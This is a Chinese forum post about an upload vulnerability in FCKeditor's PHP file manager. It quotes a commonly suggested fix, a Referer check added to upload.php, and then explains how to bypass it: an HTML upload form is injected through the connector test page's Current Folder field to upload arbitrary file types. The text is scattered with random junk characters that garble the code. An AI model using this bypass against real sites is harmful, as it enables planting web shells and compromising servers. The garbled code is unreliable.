漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php0 Q1 T# i7 _% b9 `
网上给出的修复方案是
9 v4 [/ }6 N% Z* B7 T0 S2 r% F7 ^修复方法,删除FCK编辑器用其他的编辑器
# R ?- v1 W$ v7 j2 Q2 x7 S3 ~或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件5 _+ L3 c# L1 x# t" L/ l- J' P3 [
在6 \9 ]6 Y* N6 V# x/ p) n
require(‘config.php’);0 V2 g9 ^7 E9 {9 j6 m2 x
require(‘util.php’);3 v! }' X" R7 x1 |
的下面添加以下代码—————————–
) a, g( \: t$ w/ N" v//防止外部提交2 Y, D- `2 \* f% t
function outsidepost()! P# @$ _7 k1 ~; d+ S# y
{; r5 B$ l6 W3 L6 n2 s
$servername=$_SERVER['SERVER_NAME'];
1 }) ~7 e) B# r3 H2 L. i' T$sub_from=@$_SERVER['HTTP_REFERER'];/ w) f9 }3 D8 }' m( _" J* r
$sub_len=strlen($servername);
- V$ ]4 r8 _; ?9 w, ` F$checkfrom=substr($sub_from,7,$sub_len);
! [7 ^ q. f; }1 m0 Y' \if($checkfrom!=$servername){
" o" w) _/ ]. B& ~echo(“you don’t outsidepost!”);
. K9 L/ H/ g ?& ?7 w' Sexit;
- x* {" z& n8 W' |}: ^& X0 |- {; [5 N% d8 s- [1 k& b! Z
}
* d5 {4 R7 I6 }# S' qoutsidepost();
" F* T( T% O( ~0 c+ [; u4 w3 g防止外部提交,但是没有防止内部提交,
1 F8 S5 D( Y9 Q& U2 g2 o9 r利用方法:
. W4 {: p" ]6 k- B3 R1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
$ D) _8 |# w. c; E5 m i6 ]2,在Current Folder 框输入' f/ f. p# C. o$ I7 I: \ u
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>; S7 d) x' a" E1 D9 a
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。" J/ E; F. u# W9 z
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对